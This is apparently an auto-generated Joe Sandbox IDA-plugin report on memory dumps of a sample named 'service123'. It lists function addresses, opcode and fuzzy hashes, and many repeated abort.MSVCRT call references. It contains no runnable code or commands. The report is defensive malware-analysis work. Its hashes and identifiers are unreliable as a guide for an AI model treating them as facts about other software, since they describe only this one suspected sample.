Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2c0f4dd46ca4ec2756b9324a61cb725ab037fd37d79a7330fc1c23e9bf7b2ce5
Instruction ID: 8695647bb2faca30b49c28c92e268d30d5af567c987004ee01d98eae82f1fab3
Opcode Fuzzy Hash: 2c0f4dd46ca4ec2756b9324a61cb725ab037fd37d79a7330fc1c23e9bf7b2ce5
Instruction Fuzzy Hash: F70128B2612201CFE708FF2CD492B55B7B0FB22309F019A48D184DBB11D739E858CB91

Function 6C9C28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: fb11a017ca67a4fe9975287f9c4ff60234eb47ee0e34f8d261e32c18e4d2a2b2
Instruction ID: db80b174ee51b5cd77d993a23eed90ce4823d67fdf3fc1415be25f79d35f0b4a
Opcode Fuzzy Hash: fb11a017ca67a4fe9975287f9c4ff60234eb47ee0e34f8d261e32c18e4d2a2b2
Instruction Fuzzy Hash: 87011972642501CBE708EF18D492B5AB7B0FF22309F019A48D1959BB01DB39E85CCF92

Function 6C9C2A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a89a7a7ddbf8f8556c391581d4fb879b71cb3563c389586c6b4d3fcd734d02d2
Instruction ID: 0f000419731ed86e5146108511d7c7244efa81d7a4dc40c6ab4807c3afdf67a5
Opcode Fuzzy Hash: a89a7a7ddbf8f8556c391581d4fb879b71cb3563c389586c6b4d3fcd734d02d2
Instruction Fuzzy Hash: 9B013CB2642601CBD704EF18D491B59B7B0FF2230DF019A48D4949BB01D735E45CCB91

Function 6C9C2B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4ddd5f88ef7d45eef729fb79428689617d70dc50a58a56ff7a90fed8ae65aeb6
Instruction ID: 010cdd735b0ede1dcf009147c1044d53f10e46fc870c26b48542c060b1a8c371
Opcode Fuzzy Hash: 4ddd5f88ef7d45eef729fb79428689617d70dc50a58a56ff7a90fed8ae65aeb6
Instruction Fuzzy Hash: 67F04F72545601CBD704EF18D491B55B7B0FF2230DF019A48C0549BB01D735E45CCF91

Function 6C9C29B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2b46c0465677ba42d26ea0dd732505e21e763f85d31c24a5ce57940121918b52
Instruction ID: c71885d78f70c42616d283c62d5e3a1ed33c5df971f7c9d5a56617d9002b2e94
Opcode Fuzzy Hash: 2b46c0465677ba42d26ea0dd732505e21e763f85d31c24a5ce57940121918b52
Instruction Fuzzy Hash: 84F06DB2641601CBD704EF18D0A5B6AB7B0FF2234CF029948C054ABF01DB35E46CCB86

Function 6C9C2AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA96CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: b642517d7b01b5b029459d0557c9598ca9d02dbd0d213771615047cc7c3dbf12
Instruction ID: 7baa3f3605da920cf30ff3bbd780e91ab34278f068c9274daefb22619132988f
Opcode Fuzzy Hash: b642517d7b01b5b029459d0557c9598ca9d02dbd0d213771615047cc7c3dbf12
Instruction Fuzzy Hash: 27F03AB2546611CBD744EF18C0A176AB7B0FF22348F029988C455ABF46DB35E468CFC2

Function 6C9CB930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e5544b3aaea6ec95555251b1c3d9ed738c5f8a5c301028a370963664fd185192
Instruction ID: 432abbd3456c38214de219bd0efe3a72a8b4d07366c610262804ae4e5f56def6
Opcode Fuzzy Hash: e5544b3aaea6ec95555251b1c3d9ed738c5f8a5c301028a370963664fd185192
Instruction Fuzzy Hash: 06313931749B189FC3008E59C491356B3F9EF45358F40892AE69887B51D334EC54DB93

Function 6C9CBFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
